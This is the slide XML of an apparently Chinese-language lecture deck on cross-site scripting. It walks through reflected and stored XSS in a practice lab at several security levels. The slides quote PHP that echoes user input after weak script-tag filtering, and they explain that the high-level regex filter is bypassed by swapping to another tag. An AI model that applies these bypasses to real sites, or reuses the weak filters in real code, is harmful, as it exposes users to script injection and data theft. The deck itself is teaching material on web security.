            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="4707890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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现在来查看以下后台的代码，可以看到其确实是把&lt;script&gt;标签替换成了空字符。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 // Is there any input?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) {</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    // Get input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    $name = str_replace( '&lt;script&gt;', '', $_GET[ 'name' ] );</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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     // Feedback for end user</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    echo "&lt;pre&gt;Hello ${name}&lt;/pre&gt;";</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 ?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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来到高安全级别后，首先不要慌，他无非就是对某些字符做了一些更强的过滤而已，找对方法，还是可以实施攻击的。如图10-17所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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3.高安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 17"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="2556510"/>
            <a:ext cx="5991225" cy="3583305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-17 高安全级源代码图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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可以看到，High 级别的代码使用了正则表达式，直接把“&lt;*s*c*r*i*p*t”给过滤了，*代表一个或多个任意字符，i代表不区分大小写。这时使用&lt;script&gt;标记已经没有作用了。如下可见，对于大小写，内嵌都不能进行XSS的注入，但是替换标签就可以了，是不是很简单。如图10-18所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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3.高安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="3479800"/>
            <a:ext cx="7454265" cy="2985770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="6553200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-18 替换标签执行结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="553085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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输入“123123”数据值后，具体执行结果如图10-19所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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3.高安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 19"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="2133600"/>
            <a:ext cx="5892800" cy="3753485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="6019800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-19 执行结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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此时，查看网页的后台代码，可见确实采用的是更强的字符过滤，但是对于替换他并没有设计，让我们看看impossibl难度下会不会对替换也做出过滤，具体代码如下。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 // Is there any input?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) {</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    // Get input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    $name = preg_replace( '/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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     // Feedback for end user</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    echo "&lt;pre&gt;Hello ${name}&lt;/pre&gt;";</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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3.高安全级别</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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存储型XSS与反射型类似，但区别在于其恶意脚本长期存储于Web应用中，无需用户交互即可触发。常见于论坛和博客，若上传内容未经严格审查，易产生漏洞。这种漏洞嵌入数据库，访问时可能被攻击者利用，窃取用户个人信息。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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攻击者登录到这个页面后，在类似于留言板的地方，注入XSS攻击代码，这样所有的其他用户只要点击到这个位置就会执行XSS的代码。结果如图10-20所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 20"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3159125" y="2667000"/>
            <a:ext cx="6365875" cy="3422015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="6172200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-20 执行结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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8877300" y="5857875"/>
            <a:ext cx="3314700" cy="1000125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1000125">
                <a:moveTo>
                  <a:pt x="3314700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856588"/>
                </a:lnTo>
                <a:lnTo>
